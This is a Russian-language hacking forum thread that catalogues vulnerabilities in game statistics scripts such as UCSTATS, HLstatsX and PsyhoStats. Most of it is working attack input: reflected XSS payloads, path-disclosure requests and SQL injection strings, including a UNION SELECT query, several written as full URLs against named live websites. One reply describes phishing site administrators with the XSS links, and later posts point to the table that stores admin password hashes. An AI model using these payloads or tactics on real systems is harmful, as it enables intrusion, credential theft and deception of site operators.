Уязвимости игровых статистик

UCSTATS 1.1

Пример: http://cs.shadowzone.ru/stats/

HTML:

XSS пассивный
stats.php?game=<script>alert();</script>
stats.php?q=search&query=%22%3E%3Cscript%3Ealert();</script>&qtype=name
Полное раскрытие пути
stats.php?game=../..
[url]http://cs.shadowzone.ru/stats/stats.php?game=cstrike&q=player&uid=cec315cf55f1af878ce9cd8b852dc4fd&section=weapons&sort=-1&dir=-1[/url]
[url]http://cs.shadowzone.ru/stats/stats.php?game=cstrike&q=player&uid=cec315cf55f1af878ce9cd8b852dc4fd&section=maps&sort=map&dir=-1[/url]

пассивный SQL-inj
stats.php?game=cstrike&q=player&uid=верный юид&section=weapons&sort=weapon_kills_percent&dir=asc1
[url]http://cs.shadowzone.ru/stats/stats.php?game=cstrike&q=player&uid=cec315cf55f1af878ce9cd8b852dc4fd&section=weapons&sort=weapon_kills_percent&dir=asc1[/url]

Что-то наклёвывается SQL
[url]http://cs.shadowzone.ru/stats/stats.php?game=cstrike&q=awards&month=2&year=-1%20UNION%20SELECT%20award_month,%20award_month%20FROM%20ucstats_awards%20WHERE%20GAME=cstrike%20AND%20award_year=2005%20ORDER%20BY%20award_month%20DESC/*[/url]

stats.php?game=cstrike&q=awards&month=2&year=[SQL]

HLstatsX RC 10

Пример: http://www.halflife2.ainet.at/hlstats.php

HTML:

XSS пассивный
hlstats.php?mode=admin в поле UserName вписать: "><script>
hlstats.php?mode=actioninfo&action=Dropped_The_Bomb<script>alert()</script>&game=css
hlstats.php?mode=mapinfo&map=<script>alert()</script>&game=css
hlstats.php?mode=search&q="><script>alert()</script><a%20scr="&st=player&game=css
hlstats.php?mode=search&q=2&st="><script>alert()</script><a%20scr="&game=css&sort=name1

PsyhoStats 2.3

Пример: http://www.cs-source.ru/stats/

HTML:

Полное раскрытие пути
imgskill.php?plrid=9&w=0

Если что-то еще нашли, постите

 

da, ochen daje neplohaya podborka...

 

А использовать "пассивы" можно так....

Прислать письмо, либо в личку админу:

При этом он попадет не на http://cs.shadowzone.ru/stats/, а на страницу с кодом

А также можно: почему не заходит??? Или почему выдает ошибку????

Вобщем соц. инженерия,фишинг, если админ лох...

 

Раскрытие пути в PsyhoStats 2.3 с qPS 2.3.1 Mod 3 Final Full

PHP:

http://www.cs-source.ru/stats/downloads.php?dir=1

и здесь же XSS

PHP:

http://www.cs-source.ru/stats/downloads.php?dir=<script>alert()</script>

 

HLstatsX v 1.00 - Final (SQL-inj)

======================# Продукт: #=======================


HLstatsX - Realtime player statistics
http://www.hlstatsx.com/
http://www.hlstatsx.com/downloads/HLstatsX_V1.00.zip


===================# Уязвимые версии: #===================

HLstatsX >= 1.00 Final

=======================# Описание: #======================

Скрипт playerinfo.inc вообще не фильтрует параметр
$killLimit, который присутствует в 2 SQL-запросах.

Это может быть использовано для удаленной SQL-инъеккции.

hlstats.php?mode=playerinfo&player=1&killLimit=[SQL]

======================# Интересно: #======================

Интересно то, что при выводе ошибки синтакса запроса,
выводится host и username SQL-базы! Как они не догадались
пароль выводить?



Provided by max_pain89

 

А неподскажешь какую sql команду выполнять и как будет выглядеть плз

 

там запрос

PHP:

        $result = $db->query("
                SELECT
                    SUM(hlstats_Frags_Kills.headshot) as headshots
                FROM
                    hlstats_Frags_Kills
                GROUP BY
                    hlstats_Frags_Kills.playerId
                HAVING
          Count(hlstats_Frags_Kills.kills) >= $killLimit
        ");

но сам я сплойт написать не могу, знаю талько что пароль админа хранится тут

--
-- Таблица `hlstats_Users`
--

CREATE TABLE `hlstats_Users` (
`username` varchar(16) NOT NULL default '',
`password` varchar(32) NOT NULL default '',
`acclevel` int(11) NOT NULL default '0',
`playerId` int(11) NOT NULL default '0',
PRIMARY KEY (`username`)
) TYPE=MyISAM;